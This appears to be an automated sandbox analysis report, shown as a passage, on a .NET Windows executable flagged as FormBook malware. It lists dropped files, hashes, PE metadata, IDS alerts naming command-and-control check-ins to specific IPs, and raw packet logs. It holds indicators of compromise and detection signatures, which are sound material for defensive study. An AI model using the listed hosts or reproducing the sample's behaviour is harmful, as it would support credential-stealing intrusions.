                                                                            SHA-256:8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
                                                                            SHA-512:C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
                                                                            Malicious:false
                                                                            Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):15564
                                                                            Entropy (8bit):5.551291320499996
                                                                            Encrypted:false
                                                                            SSDEEP:384:Hte/RG0cEBW971II99bCfyMSjnOilrIR9FvImP4oX+mE:P9719KoOilr09CSlE
                                                                            MD5:E7F1796E8DF5FC62B672DA2F4429B4E4
                                                                            SHA1:D95E6A1652A1D6C86DAE3B9B7F8BF260666442B2
                                                                            SHA-256:05D85276F0B5FD0CCFAD9093B5A7D1E50773B063FD54FBDD7BA4E76893DB79B9
                                                                            SHA-512:D398997AE48EDDDE315F82942F3021904BAFE441516F3A580A059B557FB09D5A38A4D8A179C578132B107110F38E6951EAEABC07A885631670AD55D5312E6419
                                                                            Malicious:false
                                                                            Preview:@...e.......................e.W.h.....1.........................H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                                            C:\Users\user\AppData\Local\Temp\M61Ae5o9b

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\systray.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                            Category:dropped
                                                                            Size (bytes):94208
                                                                            Entropy (8bit):1.287139506398081
                                                                            Encrypted:false
                                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                                                            MD5:292F98D765C8712910776C89ADDE2311
                                                                            SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                                                            SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                                                            SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                                                            Malicious:false
                                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dgjipv3a.uw1.ps1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i35hi1li.r2m.psm1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i45pd4er.ypj.psm1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jfu4f4st.4n4.ps1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k1fvfy5u.yzh.psm1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qoqqfvf3.zav.ps1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\SC_0017384.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):692224
                                                                            Entropy (8bit):5.868183818609632
                                                                            Encrypted:false
                                                                            SSDEEP:12288:xTyShIKgMyx0SA4sZm4hGFJ4eCPBh+C3:xxhI+zSAdI2GFJ4Xz
                                                                            MD5:F296A60E1568722B060DE70B46357FE6
                                                                            SHA1:E24C65BD02D435C6B5705E9A01442E0447B77E22
                                                                            SHA-256:661F40C3448FA2ACBDDFD8297C54733B9F2D9C71E15506A4FBA876A25D279E76
                                                                            SHA-512:D3B3A695845EF355BCBA27DD6E55DA85EA345F661AD0D10BFF776E0192E21186B780C764D12E293CDEAA819854FA8D1681D585591F34627436B8CCFF97AB6D64
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.................J...D......zh... ........@.. ....................................`.................................,h..L.......FA...........................................................................h............... ..H............text....H... ...J.................. ..`.rsrc...FA.......B...L..............@..@.reloc..............................@..B................H.......4m...............................................................0'.........s......(....jo.....(....o.....(....o...........%.....(....o.....(....o.......o....r...po.....o....r...po....s.....(...+%..o......jo.....o.........(.....o.....o......(.....o.....o....(....(.....o.........(.....o....o....(....*.........(....*..{....*"..}....*.....{....*"..}....*.....{....*"..}....*.....{....*"..}....*.....{....*"..}....*.....{....*J.s....}.....(....*..0..)...........i.Y.8...............

                                                                            C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe:Zone.Identifier

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\SC_0017384.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):26
                                                                            Entropy (8bit):3.95006375643621
                                                                            Encrypted:false
                                                                            SSDEEP:3:ggPYV:rPYV
                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                            Malicious:true
                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):5.868183818609632
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            File name:SC_0017384.exe
                                                                            File size:692224
                                                                            MD5:f296a60e1568722b060de70b46357fe6
                                                                            SHA1:e24c65bd02d435c6b5705e9a01442e0447b77e22
                                                                            SHA256:661f40c3448fa2acbddfd8297c54733b9f2d9c71e15506a4fba876a25d279e76
                                                                            SHA512:d3b3a695845ef355bcba27dd6e55da85ea345f661ad0d10bff776e0192e21186b780c764d12e293cdeaa819854fa8d1681d585591f34627436b8ccff97ab6d64
                                                                            SSDEEP:12288:xTyShIKgMyx0SA4sZm4hGFJ4eCPBh+C3:xxhI+zSAdI2GFJ4Xz
                                                                            TLSH:BFE429707BF89717C5BF6B72E0B9B25847B4D466A216E78B844D52F10CD2340AC1A3AF
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.................J...D......zh... ........@.. ....................................`................................

                                                                            File Icon

                                                                            Icon Hash:185ada32e9cc368b

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x4a687a
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x6418E0D7 [Mon Mar 20 22:40:23 2023 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            jmp dword ptr [004A6888h]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            pop esp
                                                                            push 0000000Ah
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xa682c0x4c.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xa80000x4146.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xae0000xc.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0xa68880x8.text
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x20000xa48900xa4a00False0.34067126993166286data5.83594677699421IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rsrc0xa80000x41460x4200False0.20815577651515152data4.044367816999576IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0xae0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountry
                                                                            RT_ICON0xa81400x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m
                                                                            RT_ICON0xa85b80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m
                                                                            RT_ICON0xa96700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m
                                                                            RT_GROUP_ICON0xabc280x30data
                                                                            RT_VERSION0xabc680x2e4data
                                                                            RT_MANIFEST0xabf5c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                                                            Imports

                                                                            DLLImport
                                                                            mscoree.dll_CorExeMain

                                                                            Network Behavior

                                                                            Snort IDS Alerts

                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                            192.168.2.5172.67.194.22549710802031453 03/21/23-09:12:13.411086TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971080192.168.2.5172.67.194.225
                                                                            192.168.2.574.208.236.13149702802031449 03/21/23-09:11:27.575244TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970280192.168.2.574.208.236.131
                                                                            192.168.2.574.208.236.13149702802031412 03/21/23-09:11:27.575244TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970280192.168.2.574.208.236.131
                                                                            192.168.2.574.208.236.13149702802031453 03/21/23-09:11:27.575244TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970280192.168.2.574.208.236.131
                                                                            192.168.2.5172.67.194.22549710802031449 03/21/23-09:12:13.411086TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971080192.168.2.5172.67.194.225
                                                                            192.168.2.5172.67.194.22549710802031412 03/21/23-09:12:13.411086TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971080192.168.2.5172.67.194.225

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Mar 21, 2023 09:10:10.204607964 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.204669952 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.204794884 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.244721889 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.244771004 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.314131021 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.314223051 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.331425905 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.331454039 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.331841946 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.383747101 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.569000006 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.569056034 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.617197990 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.617248058 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.617260933 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.617333889 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.617363930 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.617372990 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.617403030 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.617440939 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.617489100 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.617489100 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.617489100 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.617495060 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.617517948 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.617527008 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.617542982 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.617557049 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.617588997 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.617589951 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.617607117 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.617654085 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.617682934 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.641709089 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.641772985 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.641916037 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.641935110 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.641969919 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.641987085 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.642051935 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.642110109 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.642123938 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.642133951 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.642165899 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.642195940 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.642529964 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.642575979 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.642618895 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.642632008 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.642652035 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.642673016 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.667993069 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.668103933 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.668189049 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.668215036 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.668237925 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.668272018 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.668406010 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.668510914 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.668545961 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.668556929 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.668587923 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.668603897 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.668737888 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.668801069 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.668867111 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.668884993 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.668903112 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.668940067 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.669044018 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.669110060 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.669153929 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.669162989 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.669193983 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.669217110 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.669527054 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.669589043 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.669621944 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.669630051 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.669658899 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.669677973 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.669856071 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.669913054 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.669943094 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.669959068 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.669975042 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.669996977 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.695274115 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.695343018 CET44349698188.40.83.211192.168.2.5
